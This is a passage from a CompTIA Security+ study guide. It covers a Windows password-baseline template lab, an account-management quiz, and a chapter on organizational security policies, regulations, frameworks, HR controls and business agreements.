default folder. ates, but you can add other folders.

b) Click Action > New Template. You're prompted to add a template name and description.

c) Name the template Password


Baseline and click OK.

Add a suitable description if you like. The Password Baseline


template appears in the navigation pane.

3. Configure the new template. You'll set a default password policy that can be used through
the entire organization.

a) Navigate to Password Baseline > It looks just like navigating a GPO, except that the default
Account Policies > Password value for every policy is "Not defined."
Policy.

b) Configure the visible policies as


follows.

12 passwords remembered, maximum age of 60 days,


minimum age of 1 day, 10 character minimum, must meet
complexity requirements, and not stored using reversible
encryption.

c) Right click Password Baseline and To save the policy.


click Save.

4. Load the template as a baseline for You could do this on any computer you wanted, by copying
configuration and analysis. the template file.

CompTIA Security+ Exam SY0-501 435


Chapter 9: Access control / Module B: Account management

Do This How & Why

a) In the navigation pane, collapse the Just to get it out of the way.
Security templates snap-in.

b) Right-click Security The Open Database window appears. By default it's in


Configuration and Analysis and Documents\Security\Database, but no databases
click Open Database. have been created yet.

c) Type Baseline Check and You're prompted to import a template into the database. By
click Open. default, the contents of
Documents\Security\Templates are displayed.

d) Open Password Baseline. You can now compare this computer to the template, or
configure it to match the template.

5. Check this computer against the


template.

a) Right-click Security You're asked where to log error files.


Configuration and Analysis and
click Analyze computer now.

b) Click OK. It opens in the navigation pane, so you can move through it
like any policy.

c) Navigate to Security
Configuration and Analysis >
Account Policies > Password
Policy.

To view a comparison between the database settings and those


on this computer. Some of the settings you placed on this
computer earlier match the template, but your new baseline
requires a longer password history and a lower maximum
password age.

d) Navigate to Security Since you didn't configure any of these policies in the
Configuration and Analysis > template, they all have a Database Setting of Not Defined.
Account Policies > Account
Lockout Policy.

6. Configure the computer to match the


policy.

a) Right-click Security You're asked where to log error files.


Configuration and Analysis and
click Configure computer now.

b) Click OK. It opens in the navigation pane, so you can move through it
like any policy.

c) Analyze the computer again. Click Action > Analyze computer now.

436 CompTIA Security+ Exam SY0-501


Chapter 9: Access control / Module B: Account management

Do This How & Why

d) View the password policy. This time all policies are flagged as green, matching the
database.

7. Close the MMC console. If prompted, don't save your settings.

Assessment: Account management


1. What order does Windows process GPOs in?

1. Child OU GPO

2. Domain GPO

3. Local GPO

4. Organizational Unit GPO


5. Site GPO
2. Where is the best place to assign permissions?
 A domain local group
 A global group
 An individual user
 A universal group

3. When you enforce password complexity in Windows, you can't edit the precise complexity requirements
True or false?
 True
 False

4. During a discussion of user account policies, someone suggests lowering the account lockout threshold on
the Windows domain. What would be the net effect of this change? Choose the best response.
 Less secure, and less trouble for users
 Less secure, but more trouble for users
 More secure, but less trouble for users
 More secure and more trouble for users

5. When it's so important to change passwords regularly, why would you set a minimum password age?
Choose the best response.
 To keep users from choosing simple passwords
 To keep users from bypassing history requirements
 To prevent attackers from easily cracking passwords
 To make sure users change their passwords regularly

CompTIA Security+ Exam SY0-501 437


Chapter 9: Access control / Summary: Access control

Summary: Access control


You should now know:
 About access control models, including DAC, MAC, and both interpretations of RBAC. You should
also be able to set and interpret file access permissions and inheritance.
 How to manage user accounts, groups, and OUs in Active Directory, and how to secure systems and
networks using Group Policy Objects.

438 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security
You will learn:
 How to design security policies
 About user training practices
 How to physically secure assets and manage safety controls

CompTIA Security+ Exam SY0-501 439


Chapter 10: Organizational security / Module A: Security policies

Module A: Security policies


Even if you know exactly the risks your organization faces, and just how you want to mitigate them, you're
not ready to just go and do it. Security policies are the first management controls you need to set, and if
they're not effectively designed and clearly communicated, there's no way to be sure that everyone knows
how to reliably do their part in applying and maintaining secure practices. Different parts of the overall policy
will need to specify the responsibilities of administrators, users, and managers in creating and maintaining a
secure organization. Other parts will define how your organization interacts with the rest of the world,
whether complying with security regulations or engaging in agreements and partnerships with other entities.
You will learn:
 About security policies
 How to plan secure user and personnel policies.
 About common business contracts
 How to address security concerns with third-party data access.

Security documentation
While you could just identify risks and apply controls to minimize them, the only way to be sure you're not
leaving anything out, especially in an organization of any size, is to have a documented plan for each step you
take, as well as a supporting documents and methodologies to tie the big picture together. Ideally, these
documents should cover your organization's overall business strategies and security goals, while tying in all of
the details such as valuable information assets and systems, the security controls that must protect them, and
as how both inside and outside users interact with them.
In other words, these documents are the components used to actually achieve security. You might hear them
called frameworks, policies, controls, procedures, guidelines, standards, and so on. Each of these has a
specific meaning, even if there's a lot of overlap between them.

Framework A programs or blueprint that documents the overall processes you need to design policies
achieving specific security needs. A good framework is designed and maintained by a
certification body or standards organization drawing from the practices and experiences of a
wide range of policy professionals and organizations with similar needs. It may include a
wide variety of more specific documents, or it might just be a structure for you to develop
your own.
Policies A statement describing how the organization is to be run, from the perspective of management
intent. A policy reflects the intent and goals of the organization, and generally is written for
broad audiences rather than strictly technical personnel. Compliance with policies is
mandatory for all employees or users; any exceptions defining when policies should be
disregarded themselves must be documented as policies. "User accounts must be protected by
strong passwords" might be found in a policy.
Standards A definition of specific methodologies or requirements needed to satisfy policies. Standards
are also mandatory, but tend to have a more technical and specific focus than policies.
"Passwords must be at least eight characters long and contain letters, numbers, an special
characters" might be found in a standard.
Guidelines Descriptions of best practices or recommendations for achieving a certain policy goal. In
theory, guidelines are optional and leave room for interpretation. In practice, just how
"optional" a given guideline is varies. Advice on how to design a strong password might be
found in a guideline.

440 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module A: Security policies

Benchmark A checklist of potential vulnerabilities in a piece of software along with configuration settings
you can use to harden it. Also known as a secure configuration guide. A benchmark might be
for a particular product such as an operating system, service, application, or network device. It
might also be for a generic type instead of a specific product. A benchmark for Windows
Server would tell you to make sure domain policies are set to require complex passwords.
Procedures Specific and ordered instructions for complying with a particular element of a policy or
standard. Procedures are mandatory, and written for whoever will actually perform them. In
general, a procedure represents a short-duration task, while long tasks are called processes
and contain multiple procedures. The steps needed to change or reset a password would be
written as a procedure.
Controls Any safeguard or countermeasure designed to reduce security risks. Security policies and
procedures themselves are controls, but when you see "control" used as a contrasting term it
generally means a physical or technological tool that enforces policy goals. The password-
protected login system itself is a logical control, as is the password complexity enforcement
that rejects new passwords if they don't meet the standard.

Regulatory compliance
Ultimately, the goal of security policies is to make sure the organization follows best policies in protecting its
informational assets. In a simple world, this would be just be a matter of calculating risks and then finding the
controls and procedures that minimize them. This simple approach only works in a perfect world where no
one has misconceptions about what's needed, no one cuts corners, and no one acts in bad faith implementing
security procedures - in short, a world where cybersecurity probably isn't needed anyway. For this reason,
security policies often are subject to external requirements, especially when your organization handles data
owned by other people.
Regulations depend both on your organization and the legal jurisdiction it's in, but in the US some important
ones include the following:

SOX The Sarbanes-Oxley Act of 2002 is a federal law that applies to publicly traded companies and
public accounting firms that do business in the United States. It specifies how company
financial data must be retained and protected from undocumented changes.
FISMA The Federal Information Security Management Act is a law applying to all federal agencies. It
requires every agency to develop, document, and implement an information security and
protection program.
HIPPA The Health Insurance Portability and Accountability Act specifies who can access or use PHI,
and defines security standards for its storage and access.
FERPA The Family Educational Rights and Privacy Act defines who can access student educational
records, and how that data must be protected.
GLBA The Gramm-Leach-Bliley Act sets minimum standards for the security of PII stored by financial
institutions, and requires said institutions to inform customers how their data will be used or
shared.
PCI DSS The Payment Card Industry Data Security Standard isn't a law; instead, it's administered by the
PCI Council, an industry consortium. The standard governs the storage, processing, and
transmission of payment card information, and compliance is part of the standard business
contract for any organization that wants to process payment cards.

Failure to comply with regulations does more than just hurt your organization's reputation: it can lead to stiff
fines and other legal penalties, even if you never actually suffer an attack that compromises the protected data.
Regulatory compliance is a complex field, but it's something that must be done whether or not a specific
regulation improves security in a practical sense. If you're in a policy shaping role it's your duty to research

CompTIA Security+ Exam SY0-501 441


Chapter 10: Organizational security / Module A: Security policies

and learn exactly what regulations apply to your data. If you're not, it's still a good idea to know the basics of
regulations applying to your organization. That knowledge will help you to understand exactly why your
organization's security policies and procedures are important, and how to comply with them in spirit as well
as in letter.

Policy frameworks
Since cybersecurity needs are complex and change over time, it's difficult to design a comprehensive security
approach no matter how much you know about the topic. One helpful point to remember when you're setting
up any policy structure is that your needs probably aren't as unique as you'd think. For the most part your
goals, assets, and available resources are going to be similar to those of thousands of other organizations.

Exam Objective: CompTIA SY0-501 3.1.1


You can save a lot of time and risk by choosing a policy framework that suits your business and security
needs. While the framework isn't a complete organization-specific policy set, it should contain detailed advice
and techniques you can use to design a set of customized policies. Additionally, since it uses common
language and structures, it's easy to learn from the successes or mistakes of other organizations that share your
framework.
There are several common frameworks in use both for information technology in general and for security in
particular. Some popular ones include the following.

NIST The NIST 800 series is a policy framework describing cybersecurity standards and best
practices for the US federal government. While it's designed for government agencies to
follow, it contains a lot of useful guidelines for other organizations as well, and is available
free of charge. The related but separate NIST Cybersecurity Framework is a shorter, high-
level security framework designed to give standard guidelines and language for cybersecurity
in the private sector.
ISO The ISO 27000 series is a very broad policy framework containing security guidelines for all
sorts of organizations. It's a very comprehensive framework with specific documents for
individual security areas. Like other ISO standards, it also includes a certification process so
that you can demonstrate your compliance to business partners.
COBIT The Control Objectives for Information and Related Technologies is a framework published
by ISACA, an IT professional association. The most recent version is COBIT 5, which is a
popular framework for complying with Sarbanes-Oxley rules.
ITIL The Information Technology Infrastructure Library is published by AXELOS, a joint venture
of the UK government and Capita plc. Compared to similar frameworks such as COBIT, ITIL
is more focused on the service aspect of IT, providing more detail in specific implementation
but less on underlying principles.

Which you should use depends on your needs: some are easier to implement, some are more comprehensive,
and others are particularly suited to compliance with specific regulations. You might even incorporate
multiple frameworks. Look for frameworks that are required by or designed to support regulations you need
to comply with, or which are part of your national security guidelines.
Even if you don't need to use a specific framework for regulatory purposes, also consider what frameworks
your potential business partners and customers use. Sharing a framework will make it easier to share data and
infrastructure securely. Additionally, compliance with a formal framework can demonstrate to others that you
take security seriously. For example, ISO 27001 certification is a complicated process, but in some industries
it's a valued demonstration of security commitment.

442 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module A: Security policies

Secure configuration guides


Frameworks and policies are often broad and high level treatments that help you to spell out what security
needs you have and what kinds of controls will address them. On the other hand, they usually leave a lot of
details optional or up to interpretation especially when it comes to specific hardware and software products.
This means creating your own secure baselines for system configuration and auditing will take extensive
technical knowledge and a lot of research. It's much easier and more reliable to find a secure configuration
guide that either matches the specific products you're using, or at least a more general guide that can be
customized to your software and devices.

Exam Objective: CompTIA SY0-501 3.1.2


Security standards organizations are always eager to give advice on applying controls and hardening your
network. One of the best places to look is on the CIS website at
https://www.cisecurity.org/cybersecurity-tools/. It offers both free documentation
about choosing and enacting specific security controls, and more comprehensive benchmark documents
describing how to secure specific products such as:
 Workstation, server, or mobile operating systems
 Web and application servers
 Network infrastructure devices
 Web browsers and other desktop applications

A given guide can be a very exhaustive document. The benchmark for Windows 10 Enterprise is over 900
pages, and describes a long list of operating system settings that affect security. For each, the document
describes why the it is important, what values you should use depending on your intended level of security,
how to audit that it is set correctly, and how to remedy the issue if it is not. It also describes what negative
impacts each security control may cause.
Since manually verifying configurations is a lot of work and prone to human error, where possible it's best to
integrate the advice from configuration guides into automated compliance checkers or configuration scripts.
With their benchmarks, CIS offers automated auditing scanners, remediation tools, and even pre-hardened
virtual system images. Other vendors have similar products. Most of these are not free, but have potential to
save your organization money and reduce chance for error.

Discussion: Security documentation


1. What's the difference between a standard and a policy?
They have a lot of overlap, but generally a standard is a mandatory set of technical requirements used to
meet a policy.
2. What regulations are particularly relevant to your organization?
Answers may vary by jurisdiction and field of business.
3. You're creating a whole new set of security policies. What would you use to choose a policy framework?
Important questions include the nature of your organization, what regulatory requirements apply to it,
and what will make it easier to work with potential business partners.
4. In your browser, navigate to https://www.cisecurity.org/cis-benchmarks/. Which of
those benchmarks could you use to securely configure your network?
Answers may vary, but there are a wide variety for specific platforms and general categories.

CompTIA Security+ Exam SY0-501 443


Chapter 10: Organizational security / Module A: Security policies

Typical policies
Creating an effective security policy isn't easy: it needs input from administrators, human resources, senior
management, and legal staff, and it has to address both organizational goals and technological details.

Exam Objective: CompTIA SY0-501 2.3.9.1, 5.1.1


A security policy might be a single comprehensive document, or a set of multiple documents applying to
different aspects of security, Either way, it needs to be viewed as a functional whole, with high-level
statements explaining the organization's overall security goals and the measures, possibly in some detail, that
should be taken to achieve them. The core policy document doesn't necessarily have to cover every detail—
the security controls you'll design based on the policy don't only include technical controls, but operational
and management procedures that will require separate documentation of their own. The boundaries can be a
bit fuzzy, but in general policies are the top-level management controls that identify security needs, while
other controls are used to enforce policies.
For example, if your risk assessment identified a need for network firewalls, your network security policy
should specify when firewalls should be deployed, what capabilities they must have, and maybe even what
vendors are acceptable. The firewalls themselves, and the procedures for installing and configuring them, are
security controls used to enforce the network policy.
A security policy exists on multiple levels, and affects a lot of different people and assets with different roles
and knowledge levels. Every part needs to be written in language that will be clear to those it affects
 For managerial staff, the policy needs to include a high level outline of the organization's goals, and the
steps that will be taken to achieve them. This outline will be used as the guiding principle for the
others, and should address several elements.

• The issues the policy is meant to address


• Legal or regulatory requirements relevant to the organization's IT services
• Who has access to what information
• What activities, processes, and actions will be necessary to enact the policy
• How employees are expected to comply with the policy
• The consequences for noncompliance
• Procedures for revising or changing security policies

 For IT administrators and technicians, policies need to include technical documentation about how
informational assets will be secured.

• General guidelines for best practices and security goals


• Technological standards in use through the network
• Procedure documents for specific configuration or maintenance tasks
• User permissions policies, including local and remote access as appropriate
• Data disposal policies, for secure erasure or destruction of sensitive data on discarded media.

 Acceptable use policies (AUPs) target end users, who may be employees or customers using hosted
services. Each of the two will likely have a different AUP.

• Secure practices and guidelines for use of network resources, appropriate to the user's access level
and technological knowledge
• Codified expectations of user privacy, and consent to security-based monitoring of user activity

444 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module A: Security policies

• Guidelines for creating and maintaining secure passwords

 Asset management policies govern the tracking of hardware and software assets through the whole life
cycle of procurement, deployment, and disposal.
 Incident response policies specify exactly what steps will be taken in response to a security incident, in
order to minimize and repair damage without exposing the network to further risk.
 Disaster planning and business continuity policies specify the steps that will be taken to secure assets,
protect staff, and maintain business operations in terms of natural or artificial disasters and disruptions.
 Change management policies provide guidelines for updating policies and procedures to suit changing
needs, without introducing new vulnerabilities.
 Standard operating procedures (standing operating procedures in military organizations) are lists of
step by step instructions to perform routine tasks. Procedures aren't traditionally considered policies
themselves, but policies should specify how procedures are developed, stored, and taught to employees.

Policy documents
Policy documents should follow a clear and consistent standard to avoid confusing their intended audience or
leaving doubt as to which of multiple policies applies in a given situation. When you design them, it's a good
idea to check existing policies from other organizations for ideas you might have overlooked. You can also
look for recommendations from security organizations. ISO 27002:2013 is a popular standard that specifies
best practices for information security management.
When it comes to the actual format of the document, a typical security policy might contain the following
sections:

Overview Plainly states the purpose of the policy. In the case of security, this should
include the risk being addressed and how the policy will minimize it.
Scope Defines where the policy applies. Scope can include what employees need to
follow it, or what organizational divisions and systems it affects.
Policy details The actual rules defined by the policy: essentially a list of dos and don'ts. This
may be broken into sections, and it may refer to external procedures, standards,
and other guidelines not contained within the document.
Enforcement and auditing Defines who is responsible for verifying that the policy is followed, and what
consequences there are for policy violations.
Definitions A list of technical or professional terms, external standards or documents, or
other elements that a reader of the policy needs to know in order to fully
understand it.
Revision history A list of dates when the policy has been changed, as well as who made and
authorized each change. This is important to make sure all parties are up to date
and to verify that past activities were in compliance with the policies in place at
the time.

CompTIA Security+ Exam SY0-501 445


Chapter 10: Organizational security / Module A: Security policies

Acceptable use and privacy policies


Technical controls such as access permissions can limit the harm a careless or malicious end user can do, but
they can't eliminate it. Every organization needs a formal acceptable use policy (AUP) specifying how
employees are allowed to use company resources, such as hardware, software, and network services. If your
organization provides user services to outside customers, they'll need their own, separate AUP.

Exam Objective: CompTIA SY0-501 5.1.3.9


The goal of any AUP is to prevent user behavior that compromises security, hurts performance, or damages
your corporate reputation. For instance, even if your office is pretty tolerant about letting employees use the
network for personal communications, it's still unacceptable if they install questionable software on their
workstations, spend all day on social networking sites instead of working, or use a work account to send
harassing email to people. Even what sounds like common sense to one user needs to be spelled out to
another.
For an AUP to be enforceable rather than a list of friendly suggestions, it must specify what consequences
management will take in case of violation. Additionally, users must be required to sign or otherwise provably
affirm that they have read it before they access any company resources. Otherwise, you might not be able to
do much about abuses: firing an employee for "policy violations" without being able to show just what terms
the employee agreed to then violated can be grounds for an unlawful termination suit. For internet or remote
access services, you'll also need to specify the legal jurisdiction, generally your central location, which
governs any legal action resulting from policy violations.
Acceptable use policies vary widely between organizations, depending on their security needs and
management philosophies, but they typically include use of the following:

Internet A restrictive internet policy could prohibit any personal internet use on company
systems. More often, personal use is allowed with restrictions on inappropriate or
offensive content, resource-intensive or legally questionable P2P file sharing, and
excessive time spent on social networks or personal email during business hours.
Network policies might also define the remote access or VPN solutions used by
employees who are traveling or working from home.
Company accounts Use of company email accounts, website or social media accounts, or any other
resources that associate the user with the organization itself need special scrutiny.
Misuse of these resources can cost money, damage business relationships and
public reputation, or even open the organization itself to legal consequences—
users given access to them must agree to use them appropriately.
Hardware and software Policies should define both what hardware and software users have access to and
what changes they can make. A restrictive workplace might prevent any changes
to workstation configurations and strictly define what software can be used for
what tasks. Even a permissive company should regulate employee software
installation or configuration changes that might hurt performance or compromise
security. Software policies might have particular requirements for personal
systems: for example, a home computer used for work or joined to the company
network should be kept up to date and have approved antivirus software.
Mobile devices Every company today needs policies regarding laptops and mobile devices
brought to the workplace or used for work tasks, whether they're personal or
company owned. These policies should address personal use of devices, security
settings, what devices are permissible for work phone and email use, and what to
do if a device is stolen. They should also address network connections, both of
personal devices to work networks, and company devices to non-work networks.
In some high-security environments, mobile devices might be forbidden entirely.

446 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module A: Security policies

Hand-in-hand with an AUP you need to establish a privacy policy defining just what user information and
activities will be recorded and monitored, and how it will be used by the company. Users naturally assume
that their behavior and information will be private and untraced, even when they're using secure corporate
systems that must carefully log user activity, and they might unreasonably resent even mild monitoring when
it comes to light. Laws and industry regulations might restrict how user data, especially of outside customers,
can be collected or shared without explicit consent. To avoid misunderstanding, policies should not only be
made clear to all users, but any changes in them should also be communicated.

Password policies
Passwords are widely used throughout information security, by administrators and end users alike. They're the
easiest kind of credentials to use, and while they can be very secure they're also very easy to screw up.
One half of the problem is administrative. Passwords are prime targets for data theft, and a number of high
profile data breaches in recent years have resulted in the theft of unsecured or poorly secured user data. Even
on interior servers, passwords need to be stored securely, typically in hashed and salted form. They should
never be transmitted in clear text over the network.
The other half is user policies. In today's networks users, whether employees or customers, might have to
manage a lot of passwords in their daily lives. If left to themselves, they'll use very simple passwords, reuse
them for account after account, and share them with others. It's not hard to tell that that's a security nightmare.
To solve it, you need a policy requiring strong passwords, ideally enforced by technical controls such as
domain policy settings.
How to design a password policy is a heavily debated topic in security circles. While it's generally agreed that
passwords should be hard to guess and frequently changed, if you make them too hard for users to remember,
they're either going to be constantly locked out of the system, write their passwords on post-it notes, or
otherwise compromise the system's performance or security. Typical password policies address the following
elements.

Length Short passwords are easily cracked. Most experts recommend at least 8-12
character passwords for strong security, longer if they're not sufficiently complex.
Complexity Passwords should never be easily guessed words or patterns, or based on
employee or user names. Even if it's not a totally random string, a complex
password should contain a mix of upper- and lower-case letters, numbers, and
special characters.
Duration The longer a password is used, the more likely it is to be leaked or discovered.
Requiring passwords be changed periodically, typically every 30 to 90 days,
reduces this risk.
History Switching back and forth between two passwords isn't much more secure than
using the same one all the time, so recording password history makes sure new
passwords are just that, new. Secure password policies might store 12-24 prior
passwords. When password history is enforced, it's common to also restrict how
often a password can be changed: this prevents a lazy user from changing
passwords a dozen times in ten minutes just to not have to remember anything
new.
Sharing and storage Personal accounts and passwords obviously should not be shared with anyone
else. They should also not be written down or otherwise stored in non-secure
locations. In cases where passwords or encryption keys do need to be backed up or
communicated, there should be a secure method for doing so.

CompTIA Security+ Exam SY0-501 447


Chapter 10: Organizational security / Module A: Security policies

Human Resource policies


Human Resources personnel are a vital link in maintaining organizational security. When designing policies,
you should consider the role of HR in every step of the employment cycle.

Exam Objective: CompTIA SY0-501 4.4.2.2, 5.1.3.5, 5.1.3.6, 5.1.3.7

Hiring Most hiring policies are designed not only to ensure applicants are qualified for the job, but
to weed out those who might be untrustworthy or unreliable. It's an especially important
when hiring someone for a position with access to valuable resources. Secure hiring
processes make use of interview questions, background checks, and legal contracts like
NDAs or non-compete agreements to make sure that new employees can be trusted with
sensitive information.
Training HR personnel should oversee the orientation and ongoing education of employees, and
security is no exception. Even if specific training procedures are conducted by relevant
technical staff or trainers, it's HR's duty to make sure that all employees are qualified to
securely perform their duties. The onboarding process should also include setting up user
accounts, credentials, and whatever else technically is needed for the position.
Enforcement HR should include security concerns in ongoing employee evaluation and review processes,
and oversee remedial or disciplinary measures in response to security incidents or policy
violations.
Termination When employees leave for any reason, HR must see that their security credentials are
revoked, their accounts disabled, and any critical duties and permissions they have are
immediately passed on to another suitable employee through a formal offboarding process. If
an employee's termination is conducted on unfriendly terms, it is important that HR
communicate with network administrators to revoke permissions quickly: this reduces the
chances of any malicious actions on the way out. An exit interview is also important, both to
gain information about the employee's experiences and reasons for departure, and to identify
any employee knowledge about business operations which has not been documented.
Ethics Even beyond verifying compliance with the letter of every agreement, HR should take a
leadership role in promoting a code of ethics for the organization. Employees should be
expected to be honest, responsible, and legal in their work activities even where there isn't a
rule to cover the specific situation. They should also be encouraged to come to management
with any ethical questions. Employees and managers that keep to an ethical code are less
likely to compromise the organization's security or reputation.

Secure personnel policies


In any organization, many of the biggest threats are on the inside. A malicious employee given too much trust
can easily cause more damage than an outside attacker, and even a well-meaning but careless and lazy worker
can make mistakes that compromise the whole company. On the other extreme, even an excellent employee
can be a risk—what will you do if something happens to that tireless and multi-talented technician who's the
only one that understands how the whole network fits together?

Exam Objective: CompTIA SY0-501 4.4.2.1, 4.4.2.6, 5.1.3.1, 5.1.3.2, 5.1.3.3, 5.1.3.4
Technical controls like monitoring can't solve all of these problems, and too much suspicion can make for an
unhealthy work environment anyway. Fortunately, the most useful policies for finding employee dishonesty or
mistakes are also ideal for other purposes, and when they're applied consistently and impersonally no one has
cause to feel singled out. Additionally, knowing that normal procedures are likely to catch policy violations
will reduce the temptation of employees to cheat or get lazy.

448 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module A: Security policies

Least privilege Employees should only be given permissions needed to perform their regular duties:
this not only limits the damage that can be done by malicious behavior or human
error, but it also by an attack that compromises that employee's account. In
particular, administrators should always have ordinary user accounts with normal
privileges for everyday tasks, and only use administrative credentials for tasks that
actually require them. Determining exactly what permissions a given employee
needs might require input from a combination of department managers and system
administrators.
Mandatory vacations Employees should not only receive vacation time, but be required to take it. It's not
just a matter of preventing burnout: employees committing fraud or embezzlement
frequently refuse optional vacations since someone else taking over their duties
might notice what they've been doing. Even when there's no wrongdoing, having a
critical employee out of the office for a week makes sure you have some
combination of people who can fill in when necessary.
Rotation of duties Very similar to mandatory vacations, it's a good idea to rotate tasks and
responsibilities regularly between multiple qualified employees. This way, each
employee will naturally notice any mistakes or irregularities caused by the previous
person to handle the job. It has the side benefit of making sure that employees are
amply experience in a wider variety of responsibilities.
Separation of duties It's tempting to put a long and complex process in the hands of a single skilled
employee who can see it through from start to finish, but it's not always a good idea.
Breaking sensitive processes up into multiple tasks which are each performed by a
different person prevents fraudulent activity by a single employee from going
undetected. Even without fraud coming into play, it allows each employee to spot
mistakes made by others.
Recertification All user privileges and credentials, especially but not limited to user accounts,
should be subject to a regular review and approval process. Not only should you
remove or disable accounts that are inactive or no longer needed, but you should
make sure active users still have least privilege permissions for their current job
duties. Account review can be automated in part by use of identity management
tools.
Clean desk policy Keeping a literal clean desk in a customer-facing position is good for company
image, but in security terms a clean desk policy is about keeping information from
where just anyone can get a hold of it. Literal things on desks are still a factor:
papers, keys, access cards, and storage devices should be out of sight and
appropriately secured when not attended. Beyond that, filing cabinets should be
locked, mobile devices secured, and workstations locked when their user is not
present. Some assets might be more strictly secured than others.

Asset management
IT assets include all hardware and software components important to your infrastructure.
 Computers and network appliances
 Peripherals and other devices
 Data and storage media
 Software and software licenses
 Supporting infrastructure such as network cabling, HVAC systems, and server rooms.

CompTIA Security+ Exam SY0-501 449


Chapter 10: Organizational security / Module A: Security policies

Exam Objective: CompTIA SY0-501 1.6.13, 2.3.13


Assets don't only have intrinsic value: each can also be used as a vector for attackers to compromise the rest
of your organization. It's essential that you have asset management policies that make sure all assets are
documented and secured through their entire life cycle from acquisition to disposal. In particular,
undocumented or poorly documented hosts lead to problems with system sprawl, where underutilized and
poorly maintained systems make an ideal foothold for attack.
You can use software and hardware tools to assist in asset management, but from a policy standpoint the
important points are to make sure assets are tracked and secured appropriately, and to make sure there is a
clear path of human accountability for assets that are missing, damaged, or compromised. At any point in its
life cycle, an asset should have the following roles defined.

Owner The person ultimately responsible for the deployment and security of the asset. Typically a
management or executive position.
Custodian The person responsible for deploying and securing the asset on a technical level, in compliance
with the instructions of the owner.
User Individuals authorized to access or make use of the asset, typically under the oversight of the
custodian and always in accordance with the instructions of the owner.

Change management
One of the marks of an industrious manager, administrator, or other employee is an endless desire to find a
better way to do things. Unfortunately, this can be a disaster for security. A change that seems beneficial, even
one that actually is beneficial, might have less obvious side effects that can introduce new problems. For
example, SSDs have massive performance benefits over traditional hard drives, so an IT administrator might
want to make sure all new workstations have SSD system drives. The problem is, your secure file erase and
drive wipe methods, including physical degaussers, designed for hard drives won't work right on SSDs. If
nothing else is changed, the administrator just introduced a risk of later disposing of SSDs full of sensitive
data. That's just one example: networks especially are notorious for being carefully arranged structures that
can collapse with a single well-meaning but mistaken tweak.

Exam Objective: CompTIA SY0-501 5.3.3


No sensible organization wants to stop innovation or discourage the sort of employee that has useful ideas.
Instead, it's vital to channel them through a clearly defined change management process. How long and
formal the process should be depends both on the nature of the organization and the complexity of the change,
but it should always be conducted by experts who can judge its benefits and potential impacts, and it should
ask questions that will help the reviewers decide whether to approve, deny, or request modifications to the
change.
 Does the change have a meaningful benefit?
 What side effects, good and bad, will it have?
 How hard will it be to implement?
 How can any newly introduced risks be managed?

Documenting approved changes is as important as approving them in the first place. The change itself needs
to be recorded along with the results of its review process. Any policies or procedures affected by the change
need to be updated as well, and personnel trained accordingly.

450 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module A: Security policies

Discussion: Security policies


For this discussion, have an existing security policy document on hand. It can be one from your organization,
one supplied by your instructor, or one found online.
1. How does each element of the policy document further overall organizational security goals?
Answers may vary.
2. What changes would you make to the policy to increase security?
Answers may vary.
3. Why would a CEO, a network technician, and a sales representative each need to refer to a very different
security policy document?
There are a number of possible reasons. One important one is technical knowledge: an end user or
manager might not understand the details of a policy meant for network technicians. Another is company
role: the technician needs policies for administering network functions, the CEO needs them to
understand the company's security needs on a strategic level, and an sales representative needs them to
practice secure user behaviors. A third is security in itself: security policies themselves are sensitive
information, and should be kept to those who need to know them.
4. What security lapses have you seen that were likely due to missing or unclear policies?
Answers may vary. Even leaving out cases where a policy was written but not communicated, common
problems include unwritten rules, failure to specify best practices, failure to assign responsibility for
security procedures, or failure to update policies as needs change.

Business agreements
Security isn't only impacted by employee activities: any time your organization enters in a business agreement
to share data or integrate systems with another, or even contract an outside party to do work involving access
to company assets and customer data, security could be compromised. At the least, some aspects of security
will be put outside your organization's control, and the same is true of your business partner. It's even more
complicated if you, or your partner, have existing agreements with other organizations.

Exam Objective: CompTIA SY0-501 5.1.2, 5.1.3.6


Interoperability agreements rely on mutual trust and technical understanding of each other's systems, but
those alone leave a lot of questions. Data ownership is one: who is responsible for maintaining backups of
that shared database? Privacy is another: who in both organizations is allowed to access the database, and how
will it be secured from unauthorized access? To preserve security of both parties' assets, the agreement must
answer these questions in the form of policy statements. These policies need to be enforced not only by
security controls in both organizations, but by mutually binding legal documents.
Some business agreements are standardized, take-it-or-leave-it policies similar to user agreements within the
organization: unless you're an enormous company, when you contract with an ISP you're probably going to
get the same standard customer policy every similar business does, and just need to read and agree with it.
Other agreements are custom contracts, where all involved parties need to negotiate their mutual needs and
find agreement. Regardless of which type a contract is, as a security professional you need to understand the
risks the agreement creates, and how it affects your and your organization's responsibilities.
The interoperability agreements usually designed and negotiated by management and legal staff can seem like
a confusing jumble of acronyms when you're new to them, but it's important to distinguish between common
types and recognize how they can affect security.

CompTIA Security+ Exam SY0-501 451


Chapter 10: Organizational security / Module A: Security policies

Service-level agreement A formal definition of a service provided to or by the organization, typically


(SLA) including expectations for performance, reliability, and other service metrics. For
example, a cloud provider's SLA would specify their minimum obligations for
availability, performance, and data security, along with their liabilities if they
cannot meet the agreement. The SLA may be supplemented by more specific
Operational-level agreements (OLAs).
Memorandum of A less formal agreement of mutual goals between two or more organizations,
understanding (MOU) commonly used when a formal contract has not been completed or would not be
appropriate. Sometimes synonymous with a letter of intent. The MOU may or may
not be legally binding depending on its terms, but it should shape company policy
as though it were.
Interconnection security A security-focused document that specifies the technical and security requirements
agreement (ISA) involved in creating and maintaining a secure connection between two parties,
usually in support of an existing MOU. Typically an ISA describes connection
requirements, what security controls will be used, and a topological map of the
connection.
Business partnership A written agreement defining the general relationship between business partners.
agreement (BPA) At the least, it defines how each organization shares profits, losses, property, and
liability; it also defines partners' responsibilities to each other, and a dissolution
process for if and when any partner leaves the agreement. Most of a BPA is
standard terms applicable to any business venture, but where informational assets
are involved there might be provisions relating to its security either in the BPA
itself or in related agreements.
Non-disclosure A legal agreement that outlines proprietary or otherwise confidential information
agreement (NDA) that will be shared between two or more parties, and may not be disclosed. It may
be one-way to protect information one party owns and shares with others, or two-
way to share information passing in both directions. As well as business partners,
employees might have to sign NDAs or similar documents as part of their
onboarding process.

452 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module A: Security policies

Third-party security concerns


If it weren't hard enough making security responsibilities and liabilities clear in two-party agreements like
with customers or business partners, in practice third parties are likely to come into it, further complicating
